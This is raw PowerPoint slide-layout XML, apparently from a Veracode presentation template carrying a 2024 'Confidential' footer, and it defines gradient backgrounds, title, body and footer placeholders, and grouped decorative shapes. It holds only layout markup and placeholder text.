          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="43000">
                <a:srgbClr val="007EA2"/>
              </a:gs>
              <a:gs pos="1000">
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="99000">
                <a:schemeClr val="tx2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2393821777"/>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reak_Light_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="43000">
              <a:srgbClr val="007EA2"/>
            </a:gs>
            <a:gs pos="1000">
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="99000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
          <a:tileRect/>
        </a:gra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BC2805F-3C07-734E-BA3F-464EDE4C56F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB852A6A-7E13-894B-BFAA-A37F601C40F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24CE348-7B71-0FB9-45B7-9EE6B3481AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1090863"/>
            <a:ext cx="11481023" cy="2807369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>this statement </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012247F5-4BC4-2AC6-2584-3349D5D8C020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2817291" y="4693516"/>
            <a:ext cx="6641432" cy="1022350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147957699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ntent_Light_BLANK">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="43000">
              <a:srgbClr val="007EA2"/>
            </a:gs>
            <a:gs pos="1000">
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="99000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397497" y="6526743"/>
            <a:ext cx="2479816" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1966486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Title_Dark_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="43000">
              <a:srgbClr val="007EA2"/>
            </a:gs>
            <a:gs pos="1000">
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="99000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="8100000" scaled="1"/>
          <a:tileRect/>
        </a:gra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8DE3857-C9AB-F3DB-4001-0886EB857CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9497086" y="-12415"/>
            <a:ext cx="2694914" cy="6882829"/>
            <a:chOff x="5796289" y="-63014"/>
            <a:chExt cx="2721059" cy="6949602"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="99000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="4000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="463" name="Group 462">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069C532D-1E38-81FA-83A3-375C4536C4F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="641440"/>
              <a:ext cx="2721059" cy="1362196"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="1362196"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="464" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD256094-2693-A35F-CC1C-F8A35B7F6200}"/>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65" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2296A149-A69D-76C6-9FCC-08A109691400}"/>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66" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1830890-73C8-7E79-A35E-4AFCA82BBEC1}"/>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82" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F575B5B2-855A-AA91-E410-B8AD4A103F7E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6936261" y="1992224"/>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83" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06A9C11-F917-4953-DF18-3E1892F302B1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7861538" y="1992224"/>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477" name="Group 476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02203CE-B363-63EF-B9C2-93A31CB1D853}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="-63014"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="478" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F536C978-A71C-D0E5-0BB1-5F6D0279D535}"/>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79" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05F99FD-76B3-D361-E17F-06D2FD629C61}"/>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80" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EDA22B-2E76-9794-FBC6-AEF51604347B}"/>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485" name="Group 484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D5F0EC-0C97-0452-BA25-0391E3A0042B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2037908"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="486" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78073BAF-B776-B8B2-A97F-AEF5C163523A}"/>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87" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2043221B-4850-2F04-AE08-EED1A1080FE4}"/>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88" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50F14B7-3635-6261-C251-2F4C782946C8}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Graphic 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3ABEB2-5192-BEAA-3D88-643F1623D83D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796289" y="1339674"/>
              <a:ext cx="870505" cy="659272"/>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nvGrpSpPr>
            <p:cNvPr id="496" name="Group 495">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA76DD7-4B64-5648-8707-CB49AA2C9552}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="3434376"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="497" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D05BA6F-8FA3-12B8-1510-B4CB6B143946}"/>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98" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B719725F-1058-C7CF-78FD-8F87EB668E8A}"/>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99" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3E1150-070A-0F77-B94D-99332969B506}"/>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04" name="Group 503">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32CF890E-1227-81D3-EE7F-DDF7D3BB767C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2736142"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="505" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9D8EEE-5120-AF68-F089-4CB55CDF3CD6}"/>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06" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8427990E-DEBA-6E62-3987-814189786493}"/>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07" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E6C371E-194A-D4E3-FEC0-AD6F826DB110}"/>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12" name="Group 511">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C443C7E-300F-5567-646E-47BADFD0653A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4830844"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="513" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A116024-7CED-ABC2-AEAE-B2AF0655A0FE}"/>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14" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D350D5-C214-7E68-0E2F-775ACBAE20E9}"/>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15" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63316F3C-2081-BD52-54C2-050E2D942777}"/>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20" name="Group 519">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7944809E-531C-AA50-D0C7-D2D338C5371B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4132610"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="521" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114A3463-3F96-D1FF-756C-4E740A5E5403}"/>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22" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E67210-D385-AA24-D5A0-0BA7F46D3EEF}"/>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23" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7A979A-48F2-7DD3-D200-FA8013C0BAB3}"/>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28" name="Group 527">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08321C2C-931E-FC12-38E0-FEF961DB1BE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="6227315"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="529" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B248FD-6035-4329-0928-424BEDDE385C}"/>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0" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804BEE8A-8DFF-D7D3-6C22-5C2AEEB5E5DC}"/>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1" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC0963D-5C01-4CB6-3082-206B155FC908}"/>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36" name="Group 535">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55029D81-4C96-BD14-DFBB-CE03171FC56F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="5529078"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="537" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE803A4-BEE5-217F-E1D9-528AE18DB9F1}"/>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8" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD21D53C-E40B-8058-46DA-F5278A5C6BBC}"/>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9" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2891D088-3BFB-A866-90DE-1E3D07E9B6A2}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="587" name="Group 586">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A6C3D7-FD40-5FC2-F158-82E8D659E3BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="379227" y="713647"/>
            <a:ext cx="2699420" cy="400385"/>
            <a:chOff x="4488107" y="1762031"/>
            <a:chExt cx="1820226" cy="272415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="588" name="Freeform: Shape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA0076A-B35A-CB88-A37A-7435180AF689}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5603484" y="1762031"/>
              <a:ext cx="360997" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 137160 w 360997"/>
